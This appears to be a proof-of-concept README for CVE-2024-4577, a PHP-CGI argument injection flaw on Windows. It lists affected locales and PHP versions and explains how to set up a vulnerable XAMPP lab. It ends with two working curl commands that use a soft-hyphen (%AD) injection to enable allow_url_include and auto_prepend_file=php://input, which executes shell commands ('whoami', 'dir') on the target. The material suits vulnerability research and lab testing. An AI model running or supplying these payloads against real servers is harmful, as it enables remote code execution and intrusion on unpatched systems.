CVE-2024-4577
CVE-2024-4577 is a PHP CGI Argument Injection Vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following locales:
- Traditional Chinese (Code Page 950)
- Simplified Chinese (Code Page 936)
- Japanese (Code Page 932)
All versions of XAMPP on Windows are vulnerable by default. Following PHP versions are affected on the Windows operating system:
- PHP 8.3 < 8.3.8
- PHP 8.2 < 8.2.20
- PHP 8.1 < 8.1.29
How to setup your own PoC environment
- On your Windows machine download and install XAMPP.
- Download mod_fcgid.so and paste it in
C:\xampp\apache\modules - Verify that the below code is not commented in
C:\xampp\apache\conf\extra\httpd-xampp.conf
N/APHP
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>-
Start the Apache / PHP using XAMPP Control Panel and verify that
CGI/FastCGIis running. -
Change system locale to either of the three listed locales above, and reboot the host. This will not change the Windows display language.
- Control Panel > Clock and Region > Region > Administrative > Change system locale...
-
Once rebooted start the webserver again and attack the target from any host.
N/ABASH
curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c \"whoami\"'); ?>"N/ABASH
curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c \"dir\"'); ?>"